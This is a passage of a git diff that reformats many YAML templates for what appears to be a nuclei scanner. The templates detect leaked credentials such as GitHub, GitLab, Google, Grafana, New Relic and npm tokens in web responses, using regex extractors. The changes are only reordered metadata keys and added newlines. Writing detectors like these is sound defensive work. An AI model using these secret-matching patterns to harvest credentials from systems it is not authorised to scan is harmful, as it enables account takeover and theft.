"(?i)[\"']?access[_-]?secret[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?access[_-]?key[_-]?secret[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?adzerk[_-]?api[_-]?key[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?admin[_-]?email[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?account[_-]?sid[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?access[_-]?token[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[^(null)][\"']?[\\w-]+[\"']?" + - "(?i)[\"']?access[_-]?secret[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?access[_-]?key[_-]?secret[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" diff --git a/http/exposures/tokens/generic/general-tokens.yaml b/http/exposures/tokens/generic/general-tokens.yaml index 875929b467..0bf384c2c7 100644 --- a/http/exposures/tokens/generic/general-tokens.yaml +++ b/http/exposures/tokens/generic/general-tokens.yaml @@ -4,9 +4,9 @@ info: name: Generic Tokens author: nadino,geeknik severity: unknown - tags: exposure,token,generic metadata: max-request: 1 + tags: exposure,token,generic http: - method: GET diff --git a/http/exposures/tokens/generic/jdbc-connection-string.yaml b/http/exposures/tokens/generic/jdbc-connection-string.yaml index cc20caa5cb..d14f24490d 100755 --- a/http/exposures/tokens/generic/jdbc-connection-string.yaml +++ b/http/exposures/tokens/generic/jdbc-connection-string.yaml @@ -4,9 +4,9 @@ info: name: JDBC Connection String Disclosure author: Ice3man severity: unknown - tags: exposure,token,generic metadata: max-request: 1 + tags: exposure,token,generic http: - method: GET @@ -17,4 +17,4 @@ http: - type: regex part: body regex: - - 'jdbc:[a-z:]+://[A-Za-z0-9\.\-_:;=/@?,&]+' \ No newline at end of file + - 'jdbc:[a-z:]+://[A-Za-z0-9\.\-_:;=/@?,&]+' diff --git a/http/exposures/tokens/generic/jwt-token.yaml b/http/exposures/tokens/generic/jwt-token.yaml index 323a446ab6..a963a7d104 100644 --- a/http/exposures/tokens/generic/jwt-token.yaml +++ b/http/exposures/tokens/generic/jwt-token.yaml @@ -4,9 +4,9 @@ info: name: JWT Token Disclosure author: Ice3man severity: unknown - tags: exposure,token,generic metadata: max-request: 1 + tags: exposure,token,generic http: - method: GET @@ -17,4 +17,4 @@ http: - type: regex part: body regex: - - 'eyJ[a-zA-Z0-9]{10,}\.eyJ[a-zA-Z0-9]{10,}\.[a-zA-Z0-9_\-]{10,}' \ No newline at end of file + - 'eyJ[a-zA-Z0-9]{10,}\.eyJ[a-zA-Z0-9]{10,}\.[a-zA-Z0-9_\-]{10,}' diff --git a/http/exposures/tokens/generic/shoppable-token.yaml b/http/exposures/tokens/generic/shoppable-token.yaml index 51683423e9..9cd48095ce 100644 --- a/http/exposures/tokens/generic/shoppable-token.yaml +++ b/http/exposures/tokens/generic/shoppable-token.yaml @@ -6,9 +6,9 @@ info: severity: unknown reference: - https://ask.shoppable.com/knowledge/quick-start-api-guide - tags: exposure,shoppable,token,auth,service,generic metadata: max-request: 1 + tags: exposure,shoppable,token,auth,service,generic http: - method: GET diff --git a/http/exposures/tokens/github/github-app.yaml b/http/exposures/tokens/github/github-app.yaml index 2bb89da6a6..e6f6d2945c 100644 --- a/http/exposures/tokens/github/github-app.yaml +++ b/http/exposures/tokens/github/github-app.yaml @@ -10,8 +10,8 @@ info: - https://docs.github.com/en/developers/apps/building-oauth-apps/authorizing-oauth-apps - https://github.blog/2021-04-05-behind-githubs-new-authentication-token-formats/ metadata: - max-request: 1 verified: true + max-request: 1 tags: github,app,token,exposure http: @@ -23,4 +23,4 @@ http: - type: regex part: body regex: - - '\b((?:ghu|ghs)_[a-zA-Z0-9]{36})\b' \ No newline at end of file + - '\b((?:ghu|ghs)_[a-zA-Z0-9]{36})\b' diff --git a/http/exposures/tokens/github/github-oauth-access.yaml b/http/exposures/tokens/github/github-oauth-access.yaml index d677c217ca..473ab2a3c2 100644 --- a/http/exposures/tokens/github/github-oauth-access.yaml +++ b/http/exposures/tokens/github/github-oauth-access.yaml @@ -10,8 +10,8 @@ info: - https://docs.github.com/en/developers/apps/building-oauth-apps/authorizing-oauth-apps - https://github.blog/2021-04-05-behind-githubs-new-authentication-token-formats/ metadata: - max-request: 1 verified: true + max-request: 1 tags: github,oauth,token,exposure http: @@ -23,4 +23,4 @@ http: - type: regex part: body regex: - - '\b(gho_[a-zA-Z0-9]{36})\b' \ No newline at end of file + - '\b(gho_[a-zA-Z0-9]{36})\b' diff --git a/http/exposures/tokens/github/github-personal-access.yaml b/http/exposures/tokens/github/github-personal-access.yaml index e188b7f498..13628d5b59 100644 --- a/http/exposures/tokens/github/github-personal-access.yaml +++ b/http/exposures/tokens/github/github-personal-access.yaml @@ -10,8 +10,8 @@ info: - https://docs.github.com/en/authentication/keeping-your-account-and-data-secure/creating-a-personal-access-token - https://github.blog/2021-04-05-behind-githubs-new-authentication-token-formats/ metadata: - max-request: 1 verified: true + max-request: 1 tags: github,token,exposure http: @@ -23,4 +23,4 @@ http: - type: regex part: body regex: - - '\b(ghp_[a-zA-Z0-9]{36})\b' \ No newline at end of file + - '\b(ghp_[a-zA-Z0-9]{36})\b' diff --git a/http/exposures/tokens/github/github-refresh.yaml b/http/exposures/tokens/github/github-refresh.yaml index ee9e9a14b3..101d1430f9 100644 --- a/http/exposures/tokens/github/github-refresh.yaml +++ b/http/exposures/tokens/github/github-refresh.yaml @@ -10,8 +10,8 @@ info: - https://docs.github.com/en/developers/apps/building-oauth-apps/authorizing-oauth-apps - https://github.blog/2021-04-05-behind-githubs-new-authentication-token-formats/ metadata: - max-request: 1 verified: true + max-request: 1 tags: github,refresh,token,exposure http: @@ -23,4 +23,4 @@ http: - type: regex part: body regex: - - '\b(ghr_[a-zA-Z0-9]{76})\b' \ No newline at end of file + - '\b(ghr_[a-zA-Z0-9]{76})\b' diff --git a/http/exposures/tokens/gitlab/gitlab-personal-token.yaml b/http/exposures/tokens/gitlab/gitlab-personal-token.yaml index 5ec5e26fab..939412f043 100644 --- a/http/exposures/tokens/gitlab/gitlab-personal-token.yaml +++ b/http/exposures/tokens/gitlab/gitlab-personal-token.yaml @@ -8,8 +8,8 @@ info: - https://github.com/praetorian-inc/noseyparker/blob/main/data/default/rules/gitlab.yml - https://docs.gitlab.com/ee/user/profile/personal_access_tokens.html metadata: - max-request: 1 verified: true + max-request: 1 tags: gitlab,token,exposure http: @@ -21,4 +21,4 @@ http: - type: regex part: body regex: - - '\b(glpat-[0-9a-zA-Z_-]{20})(?:\b|$)' \ No newline at end of file + - '\b(glpat-[0-9a-zA-Z_-]{20})(?:\b|$)' diff --git a/http/exposures/tokens/gitlab/gitlab-pipeline-token.yaml b/http/exposures/tokens/gitlab/gitlab-pipeline-token.yaml index 126b139d4e..9cea0f5aec 100644 --- a/http/exposures/tokens/gitlab/gitlab-pipeline-token.yaml +++ b/http/exposures/tokens/gitlab/gitlab-pipeline-token.yaml @@ -10,8 +10,8 @@ info: - https://gitlab.com/gitlab-org/gitlab/-/issues/371396 - https://gitlab.com/gitlab-org/gitlab/-/issues/388379 metadata: - max-request: 1 verified: true + max-request: 1 tags: gitlab,token,exposure http: @@ -23,4 +23,4 @@ http: - type: regex part: body regex: - - '\b(glptt-[0-9a-f]{40})\b' \ No newline at end of file + - '\b(glptt-[0-9a-f]{40})\b' diff --git a/http/exposures/tokens/gitlab/gitlab-runner-token.yaml b/http/exposures/tokens/gitlab/gitlab-runner-token.yaml index 8568f86b66..0e6ecc6919 100644 --- a/http/exposures/tokens/gitlab/gitlab-runner-token.yaml +++ b/http/exposures/tokens/gitlab/gitlab-runner-token.yaml @@ -10,8 +10,8 @@ info: - https://docs.gitlab.com/ee/security/token_overview.html#runner-registration-tokens-deprecated - https://docs.gitlab.com/ee/security/token_overview.html#security-considerations metadata: - max-request: 1 verified: true + max-request: 1 tags: gitlab,runner,token,exposure http: @@ -23,4 +23,4 @@ http: - type: regex part: body regex: - - '\b(GR1348941[0-9a-zA-Z_-]{20})(?:\b|$)' \ No newline at end of file + - '\b(GR1348941[0-9a-zA-Z_-]{20})(?:\b|$)' diff --git a/http/exposures/tokens/gitter/gitter-token.yaml b/http/exposures/tokens/gitter/gitter-token.yaml index f464a5deec..17a221c365 100644 --- a/http/exposures/tokens/gitter/gitter-token.yaml +++ b/http/exposures/tokens/gitter/gitter-token.yaml @@ -8,8 +8,8 @@ info: - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/gitter-access-token.yaml - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/gitter-access-token.go metadata: - max-request: 1 verified: true + max-request: 1 tags: gitter,file,keys http: @@ -21,4 +21,4 @@ http: - type: regex part: body regex: - - (?i)(?:gitter)(?:[0-9a-z\-_\t .]{0,20})(?:[\s|']|[\s|"]){0,3}(?:=|>|:=|\|\|:|<=|=>|:)(?:'|\"|\s|=|\x60){0,5}([a-z0-9_-]{40})(?:['|\"|\n|\r|\s|\x60|;]|$) \ No newline at end of file + - (?i)(?:gitter)(?:[0-9a-z\-_\t .]{0,20})(?:[\s|']|[\s|"]){0,3}(?:=|>|:=|\|\|:|<=|=>|:)(?:'|\"|\s|=|\x60){0,5}([a-z0-9_-]{40})(?:['|\"|\n|\r|\s|\x60|;]|$) diff --git a/http/exposures/tokens/gocardless/gocardless-token.yaml b/http/exposures/tokens/gocardless/gocardless-token.yaml index 0c3f69984b..8a00d92b30 100644 --- a/http/exposures/tokens/gocardless/gocardless-token.yaml +++ b/http/exposures/tokens/gocardless/gocardless-token.yaml @@ -8,8 +8,8 @@ info: - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/gocardless-api-token.yaml - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/gocardless-api-token.go metadata: - max-request: 1 verified: true + max-request: 1 tags: gocardless,exposure,tokens http: @@ -21,4 +21,4 @@ http: - type: regex part: body regex: - - (?i)(?:gocardless)(?:[0-9a-z\-_\t .]{0,20})(?:[\s|']|[\s|"]){0,3}(?:=|>|:=|\|\|:|<=|=>|:)(?:'|\"|\s|=|\x60){0,5}(live_(?i)[a-z0-9\-_=]{40})(?:['|\"|\n|\r|\s|\x60|;]|$) \ No newline at end of file + - (?i)(?:gocardless)(?:[0-9a-z\-_\t .]{0,20})(?:[\s|']|[\s|"]){0,3}(?:=|>|:=|\|\|:|<=|=>|:)(?:'|\"|\s|=|\x60){0,5}(live_(?i)[a-z0-9\-_=]{40})(?:['|\"|\n|\r|\s|\x60|;]|$) diff --git a/http/exposures/tokens/google/fcm-server-key.yaml b/http/exposures/tokens/google/fcm-server-key.yaml index 7c2efb5da7..d451d35812 100644 --- a/http/exposures/tokens/google/fcm-server-key.yaml +++ b/http/exposures/tokens/google/fcm-server-key.yaml @@ -6,9 +6,9 @@ info: severity: high reference: - https://abss.me/posts/fcm-takeover - tags: exposure,token,google metadata: max-request: 1 + tags: exposure,token,google http: - method: GET @@ -19,4 +19,4 @@ http: - type: regex part: body regex: - - "AAAA[a-zA-Z0-9_-]{7}:[a-zA-Z0-9_-]{140}" \ No newline at end of file + - "AAAA[a-zA-Z0-9_-]{7}:[a-zA-Z0-9_-]{140}" diff --git a/http/exposures/tokens/google/google-api-key.yaml b/http/exposures/tokens/google/google-api-key.yaml index 3ad4bf023a..a8e8edc704 100644 --- a/http/exposures/tokens/google/google-api-key.yaml +++ b/http/exposures/tokens/google/google-api-key.yaml @@ -4,9 +4,9 @@ info: name: Google API Key author: Swissky severity: info - tags: exposure,token,google metadata: max-request: 2 + tags: exposure,token,google http: - method: GET diff --git a/http/exposures/tokens/google/google-calendar-link.yaml b/http/exposures/tokens/google/google-calendar-link.yaml index 11333c8d78..18a3f016fe 100755 --- a/http/exposures/tokens/google/google-calendar-link.yaml +++ b/http/exposures/tokens/google/google-calendar-link.yaml @@ -4,9 +4,9 @@ info: name: Google Calendar URI Disclosure author: Ice3man severity: info - tags: exposure,token,google metadata: max-request: 1 + tags: exposure,token,google http: - method: GET @@ -17,4 +17,4 @@ http: - type: regex part: body regex: - - 'https://www\.google\.com/calendar/embed\?src=[A-Za-z0-9%@&;=\-_\./]+' \ No newline at end of file + - 'https://www\.google\.com/calendar/embed\?src=[A-Za-z0-9%@&;=\-_\./]+' diff --git a/http/exposures/tokens/google/google-client-id.yaml b/http/exposures/tokens/google/google-client-id.yaml index 06955dfad4..11f2fc867a 100644 --- a/http/exposures/tokens/google/google-client-id.yaml +++ b/http/exposures/tokens/google/google-client-id.yaml @@ -7,8 +7,8 @@ info: reference: - https://github.com/praetorian-inc/noseyparker/blob/main/data/default/rules/google.yml metadata: - max-request: 1 verified: true + max-request: 1 tags: google,token,exposure http: @@ -20,4 +20,4 @@ http: - type: regex part: body regex: - - '(?i)\b([0-9]+-[a-z0-9_]{32})\.apps\.googleusercontent\.com' \ No newline at end of file + - '(?i)\b([0-9]+-[a-z0-9_]{32})\.apps\.googleusercontent\.com' diff --git a/http/exposures/tokens/google/google-oauth-prefixed.yaml b/http/exposures/tokens/google/google-oauth-prefixed.yaml index 59cefd817d..ab614963ca 100644 --- a/http/exposures/tokens/google/google-oauth-prefixed.yaml +++ b/http/exposures/tokens/google/google-oauth-prefixed.yaml @@ -7,8 +7,8 @@ info: reference: - https://github.com/praetorian-inc/noseyparker/blob/main/data/default/rules/google.yml metadata: - max-request: 1 verified: true + max-request: 1 tags: google,token,exposure http: @@ -20,4 +20,4 @@ http: - type: regex part: body regex: - - '(GOCSPX-[a-zA-Z0-9_-]{28})' \ No newline at end of file + - '(GOCSPX-[a-zA-Z0-9_-]{28})' diff --git a/http/exposures/tokens/google/oauth-access-key.yaml b/http/exposures/tokens/google/oauth-access-key.yaml index 7ec00a673e..4d91cbc2ea 100755 --- a/http/exposures/tokens/google/oauth-access-key.yaml +++ b/http/exposures/tokens/google/oauth-access-key.yaml @@ -4,9 +4,9 @@ info: name: Google OAuth Access Key Disclosure author: Ice3man severity: info - tags: exposure,token,google metadata: max-request: 1 + tags: exposure,token,google http: - method: GET diff --git a/http/exposures/tokens/grafana/grafana-cloud-token.yaml b/http/exposures/tokens/grafana/grafana-cloud-token.yaml index fc59af7451..d62b4f9755 100644 --- a/http/exposures/tokens/grafana/grafana-cloud-token.yaml +++ b/http/exposures/tokens/grafana/grafana-cloud-token.yaml @@ -8,8 +8,8 @@ info: - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/grafana-cloud-api-token.yaml - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/grafana-cloud-api-token.go metadata: - max-request: 1 verified: true + max-request: 1 tags: grafana,exposure,tokens http: @@ -21,4 +21,4 @@ http: - type: regex part: body regex: - - (?i)\b(glc_[A-Za-z0-9+/]{32,400}={0,2})(?:['|\"|\n|\r|\s|\x60|;]|$) \ No newline at end of file + - (?i)\b(glc_[A-Za-z0-9+/]{32,400}={0,2})(?:['|\"|\n|\r|\s|\x60|;]|$) diff --git a/http/exposures/tokens/grafana/grafana-key.yaml b/http/exposures/tokens/grafana/grafana-key.yaml index 263d9933cf..7d58d2c10b 100644 --- a/http/exposures/tokens/grafana/grafana-key.yaml +++ b/http/exposures/tokens/grafana/grafana-key.yaml @@ -8,8 +8,8 @@ info: - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/grafana-api-key.yaml - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/grafana-api-key.go metadata: - max-request: 1 verified: true + max-request: 1 tags: grafana,exposure,tokens http: @@ -21,4 +21,4 @@ http: - type: regex part: body regex: - - (?i)\b(eyJrIjoi[A-Za-z0-9]{70,400}={0,2})(?:['|\"|\n|\r|\s|\x60|;]|$) \ No newline at end of file + - (?i)\b(eyJrIjoi[A-Za-z0-9]{70,400}={0,2})(?:['|\"|\n|\r|\s|\x60|;]|$) diff --git a/http/exposures/tokens/grafana/grafana-serviceaccount-token.yaml b/http/exposures/tokens/grafana/grafana-serviceaccount-token.yaml index 064fd7799b..0168d41ac8 100644 --- a/http/exposures/tokens/grafana/grafana-serviceaccount-token.yaml +++ b/http/exposures/tokens/grafana/grafana-serviceaccount-token.yaml @@ -8,8 +8,8 @@ info: - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/grafana-service-account-token.yaml - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/grafana-service-account-token.go metadata: - max-request: 1 verified: true + max-request: 1 tags: grafana,exposure,tokens http: @@ -21,4 +21,4 @@ http: - type: regex part: body regex: - - (?i)\b(glsa_[A-Za-z0-9]{32}_[A-Fa-f0-9]{8})(?:['|\"|\n|\r|\s|\x60|;]|$) \ No newline at end of file + - (?i)\b(glsa_[A-Za-z0-9]{32}_[A-Fa-f0-9]{8})(?:['|\"|\n|\r|\s|\x60|;]|$) diff --git a/http/exposures/tokens/hashicorp/hashicorp-token.yaml b/http/exposures/tokens/hashicorp/hashicorp-token.yaml index 7eccf20add..59801f006c 100644 --- a/http/exposures/tokens/hashicorp/hashicorp-token.yaml +++ b/http/exposures/tokens/hashicorp/hashicorp-token.yaml @@ -8,8 +8,8 @@ info: - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/hashicorp-tf-api-token.go - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/hashicorp-tf-api-token.yaml metadata: - max-request: 1 verified: true + max-request: 1 tags: hashicorp,exposure,tokens http: @@ -21,4 +21,4 @@ http: - type: regex part: body regex: - - (?i)[a-z0-9]{14}\.atlasv1\.[a-z0-9\-_=]{60,70} \ No newline at end of file + - (?i)[a-z0-9]{14}\.atlasv1\.[a-z0-9\-_=]{60,70} diff --git a/http/exposures/tokens/heroku/heroku-api-key.yaml b/http/exposures/tokens/heroku/heroku-api-key.yaml index b1fe197e97..32aa0fc120 100644 --- a/http/exposures/tokens/heroku/heroku-api-key.yaml +++ b/http/exposures/tokens/heroku/heroku-api-key.yaml @@ -8,8 +8,8 @@ info: - https://github.com/praetorian-inc/noseyparker/blob/main/data/default/rules/heroku.yml - https://devcenter.heroku.com/articles/authentication metadata: - max-request: 1 verified: true + max-request: 1 tags: heroku,token,exposure http: @@ -21,4 +21,4 @@ http: - type: regex part: body regex: - - '(?i)heroku.{0,20}key.{0,20}\b([0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12})\b' \ No newline at end of file + - '(?i)heroku.{0,20}key.{0,20}\b([0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12})\b' diff --git a/http/exposures/tokens/jenkins/jenkins-crumb-token.yaml b/http/exposures/tokens/jenkins/jenkins-crumb-token.yaml index 51286204b8..cbe019baf4 100644 --- a/http/exposures/tokens/jenkins/jenkins-crumb-token.yaml +++ b/http/exposures/tokens/jenkins/jenkins-crumb-token.yaml @@ -9,8 +9,8 @@ info: - https://www.jenkins.io/blog/2018/07/02/new-api-token-system/ - https://www.jenkins.io/doc/book/security/csrf-protection/ metadata: - max-request: 1 verified: true + max-request: 1 tags: jenkins,crumb,token,exposure http: @@ -22,4 +22,4 @@ http: - type: regex part: body regex: - - '(?i)jenkins.{0,10}(?:crumb)?.{0,10}\b([0-9a-f]{32,36})\b' \ No newline at end of file + - '(?i)jenkins.{0,10}(?:crumb)?.{0,10}\b([0-9a-f]{32,36})\b' diff --git a/http/exposures/tokens/jotform/jotform-api-key.yaml b/http/exposures/tokens/jotform/jotform-api-key.yaml index 27cf9a0589..5e42f728d4 100644 --- a/http/exposures/tokens/jotform/jotform-api-key.yaml +++ b/http/exposures/tokens/jotform/jotform-api-key.yaml @@ -7,8 +7,8 @@ info: reference: - https://www.jotform.com/help/253-how-to-create-a-jotform-api-key/ metadata: - max-request: 1 verified: "true" + max-request: 1 tags: token,exposure,jotform http: diff --git a/http/exposures/tokens/loqate/loqate-api-key.yaml b/http/exposures/tokens/loqate/loqate-api-key.yaml index e35e626852..72301e37c7 100644 --- a/http/exposures/tokens/loqate/loqate-api-key.yaml +++ b/http/exposures/tokens/loqate/loqate-api-key.yaml @@ -6,9 +6,9 @@ info: severity: low reference: - https://www.loqate.com/en-gb/home/ - tags: exposure,token,loqate metadata: max-request: 1 + tags: exposure,token,loqate http: - method: GET diff --git a/http/exposures/tokens/mailchimp/mailchimp-api-key.yaml b/http/exposures/tokens/mailchimp/mailchimp-api-key.yaml index 0a842594fe..c7e3e14856 100644 --- a/http/exposures/tokens/mailchimp/mailchimp-api-key.yaml +++ b/http/exposures/tokens/mailchimp/mailchimp-api-key.yaml @@ -4,9 +4,9 @@ info: name: Mailchimp API Value author: puzzlepeaches severity: info - tags: exposure,token,mailchimp metadata: max-request: 1 + tags: exposure,token,mailchimp http: - method: GET diff --git a/http/exposures/tokens/mailgun/mailgun-api-token.yaml b/http/exposures/tokens/mailgun/mailgun-api-token.yaml index db07d4e5cc..5f806aea4f 100644 --- a/http/exposures/tokens/mailgun/mailgun-api-token.yaml +++ b/http/exposures/tokens/mailgun/mailgun-api-token.yaml @@ -8,8 +8,8 @@ info: - https://github.com/praetorian-inc/noseyparker/blob/main/data/default/rules/mailgun.yml - https://documentation.mailgun.com/en/latest/api-intro.html#authentication-1 metadata: - max-request: 1 verified: true + max-request: 1 tags: mailgun,token,exposure http: @@ -21,4 +21,4 @@ http: - type: regex part: body regex: - - '(?i)(?:mailgun|mg).{0,20}key-([a-z0-9]{32})\b' \ No newline at end of file + - '(?i)(?:mailgun|mg).{0,20}key-([a-z0-9]{32})\b' diff --git a/http/exposures/tokens/mapbox/mapbox-token-disclosure.yaml b/http/exposures/tokens/mapbox/mapbox-token-disclosure.yaml index 280ac7df61..89c6f24563 100644 --- a/http/exposures/tokens/mapbox/mapbox-token-disclosure.yaml +++ b/http/exposures/tokens/mapbox/mapbox-token-disclosure.yaml @@ -8,8 +8,8 @@ info: - https://docs.gitguardian.com/secrets-detection/detectors/specifics/mapbox_token - https://github.com/zricethezav/gitleaks/blob/master/cmd/generate/config/rules/mapbox.go metadata: - max-request: 1 verified: true + max-request: 1 tags: token,exposure,mapbox,disclosure http: diff --git a/http/exposures/tokens/microsoft/microsoft-teams-webhook.yaml b/http/exposures/tokens/microsoft/microsoft-teams-webhook.yaml index 02dd23a9e5..799c29c215 100755 --- a/http/exposures/tokens/microsoft/microsoft-teams-webhook.yaml +++ b/http/exposures/tokens/microsoft/microsoft-teams-webhook.yaml @@ -4,14 +4,15 @@ info: name: Microsoft Teams Webhook Disclosure author: Ice3man severity: info - tags: exposure,token,microsoft metadata: max-request: 1 + tags: exposure,token,microsoft http: - method: GET path: - "{{BaseURL}}" + extractors: - type: regex part: body diff --git a/http/exposures/tokens/newrelic/newrelic-admin-api-key.yaml b/http/exposures/tokens/newrelic/newrelic-admin-api-key.yaml index 5d1043f06d..c950574d6b 100644 --- a/http/exposures/tokens/newrelic/newrelic-admin-api-key.yaml +++ b/http/exposures/tokens/newrelic/newrelic-admin-api-key.yaml @@ -4,16 +4,17 @@ info: name: Admin API Key Disclosure author: Ice3man severity: info - tags: exposure,token metadata: max-request: 1 + tags: exposure,token http: - method: GET path: - "{{BaseURL}}" + extractors: - type: regex part: body regex: - - '(?i)NRAA-[a-f0-9]{27}' \ No newline at end of file + - '(?i)NRAA-[a-f0-9]{27}' diff --git a/http/exposures/tokens/newrelic/newrelic-insights-key.yaml b/http/exposures/tokens/newrelic/newrelic-insights-key.yaml index d4e8947867..31420eb40a 100644 --- a/http/exposures/tokens/newrelic/newrelic-insights-key.yaml +++ b/http/exposures/tokens/newrelic/newrelic-insights-key.yaml @@ -4,16 +4,17 @@ info: name: Insights Keys Disclosure author: Ice3man severity: info - tags: exposure,token metadata: max-request: 1 + tags: exposure,token http: - method: GET path: - "{{BaseURL}}" + extractors: - type: regex part: body regex: - - '(?i)NRI(?:I|Q)-[A-Za-z0-9\-_]{32}' \ No newline at end of file + - '(?i)NRI(?:I|Q)-[A-Za-z0-9\-_]{32}' diff --git a/http/exposures/tokens/newrelic/newrelic-pixie-api-key.yaml b/http/exposures/tokens/newrelic/newrelic-pixie-api-key.yaml index fb3bd6054a..ed999cde34 100644 --- a/http/exposures/tokens/newrelic/newrelic-pixie-api-key.yaml +++ b/http/exposures/tokens/newrelic/newrelic-pixie-api-key.yaml @@ -8,8 +8,8 @@ info: - https://github.com/praetorian-inc/noseyparker/blob/main/data/default/rules/newrelic.yml - https://docs.px.dev/reference/admin/api-keys/ metadata: - max-request: 1 verified: true + max-request: 1 tags: newrelic,pixie,token,exposure http: @@ -21,4 +21,4 @@ http: - type: regex part: body regex: - - "(px-api-[a-f0-9]{8}-[a-f0-9]{4}-[a-f0-9]{4}-[a-f0-9]{4}-[a-f0-9]{12})" \ No newline at end of file + - "(px-api-[a-f0-9]{8}-[a-f0-9]{4}-[a-f0-9]{4}-[a-f0-9]{4}-[a-f0-9]{12})" diff --git a/http/exposures/tokens/newrelic/newrelic-pixie-deploy-key.yaml b/http/exposures/tokens/newrelic/newrelic-pixie-deploy-key.yaml index 606e356df5..72b83fc534 100644 --- a/http/exposures/tokens/newrelic/newrelic-pixie-deploy-key.yaml +++ b/http/exposures/tokens/newrelic/newrelic-pixie-deploy-key.yaml @@ -8,8 +8,8 @@ info: - https://github.com/praetorian-inc/noseyparker/blob/main/data/default/rules/newrelic.yml - https://docs.px.dev/reference/admin/api-keys/ metadata: - max-request: 1 verified: true + max-request: 1 tags: newrelic,pixie,token,exposure http: @@ -21,4 +21,4 @@ http: - type: regex part: body regex: - - "(px-dep-[a-f0-9]{8}-[a-f0-9]{4}-[a-f0-9]{4}-[a-f0-9]{4}-[a-f0-9]{12})" \ No newline at end of file + - "(px-dep-[a-f0-9]{8}-[a-f0-9]{4}-[a-f0-9]{4}-[a-f0-9]{4}-[a-f0-9]{12})" diff --git a/http/exposures/tokens/newrelic/newrelic-rest-api-key.yaml b/http/exposures/tokens/newrelic/newrelic-rest-api-key.yaml index e9ba318fbc..491335a270 100644 --- a/http/exposures/tokens/newrelic/newrelic-rest-api-key.yaml +++ b/http/exposures/tokens/newrelic/newrelic-rest-api-key.yaml @@ -4,16 +4,17 @@ info: name: REST API Key Disclosure author: Ice3man severity: info - tags: exposure,token metadata: max-request: 1 + tags: exposure,token http: - method: GET path: - "{{BaseURL}}" + extractors: - type: regex part: body regex: - - '(?i)NRRA-[a-f0-9]{42}' \ No newline at end of file + - '(?i)NRRA-[a-f0-9]{42}' diff --git a/http/exposures/tokens/newrelic/newrelic-synthetics-location-key.yaml b/http/exposures/tokens/newrelic/newrelic-synthetics-location-key.yaml index 2b32e5406f..af1d855410 100644 --- a/http/exposures/tokens/newrelic/newrelic-synthetics-location-key.yaml +++ b/http/exposures/tokens/newrelic/newrelic-synthetics-location-key.yaml @@ -4,16 +4,17 @@ info: name: Synthetics Location Key Disclosure author: Ice3man severity: info - tags: exposure,token metadata: max-request: 1 + tags: exposure,token http: - method: GET path: - "{{BaseURL}}" + extractors: - type: regex part: body regex: - - '(?i)NRSP-[a-z]{2}[0-9]{2}[a-f0-9]{31}' \ No newline at end of file + - '(?i)NRSP-[a-z]{2}[0-9]{2}[a-f0-9]{31}' diff --git a/http/exposures/tokens/nextjs/cipher-secret-key.yaml b/http/exposures/tokens/nextjs/cipher-secret-key.yaml index 26c4680ec7..91897a9e63 100644 --- a/http/exposures/tokens/nextjs/cipher-secret-key.yaml +++ b/http/exposures/tokens/nextjs/cipher-secret-key.yaml @@ -4,9 +4,9 @@ info: name: Cipher Secret Key Exposure author: israel comazzetto dos reis severity: info - tags: exposure metadata: max-request: 1 + tags: exposure http: - method: GET diff --git a/http/exposures/tokens/npm/npm-access-token.yaml b/http/exposures/tokens/npm/npm-access-token.yaml index a277ef6930..5d2eb78e26 100644 --- a/http/exposures/tokens/npm/npm-access-token.yaml +++ b/http/exposures/tokens/npm/npm-access-token.yaml @@ -10,8 +10,8 @@ info: - https://github.com/github/roadmap/issues/557 - https://github.blog/changelog/2022-12-06-limit-scope-of-npm-tokens-with-the-new-granular-access-tokens/ metadata: - max-request: 1 verified: true + max-request: 1 tags: npm,token,exposure http: @@ -23,4 +23,4 @@ http: - type: regex part: body regex: - - "(npm_[A-Za-z0-9]{36})" \ No newline at end of file + - "(npm_[A-Za-z0-9]{36})" diff --git a/http/exposures/tokens/nuget/nuget-api-key.yaml b/http/exposures/tokens/nuget/nuget-api-key.yaml index d3bda7df62..2ba53107bf 100644 --- a/http/exposures/tokens/nuget/nuget-api-key.yaml +++ b/http/exposures/tokens/nuget/nuget-api-key.yaml @@ -8,8 +8,8 @@ info: - https://github.com/praetorian-inc/noseyparker/blob/main/data/default/rules/nuget.yml - https://docs.microsoft.com/en-us/nuget/nuget-org/publish-a-package#create-api-keys metadata: - max-request: 1 verified: true + max-request: 1 tags: nuget,token,exposure http: @@ -21,4 +21,4 @@ http: - type: regex part: body regex: - - "(oy2[a-z0-9]{43})" \ No newline at end of file + - "(oy2[a-z0-9]{43})" diff --git a/http/exposures/tokens/openai/openai-api-key.yaml b/http/exposures/tokens/openai/openai-api-key.yaml index 8c69e862ae..4f456aa8a8 100644 --- a/http/exposures/tokens/openai/openai-api-key.yaml +++ b/http/exposures/tokens/openai/openai-api-key.yaml 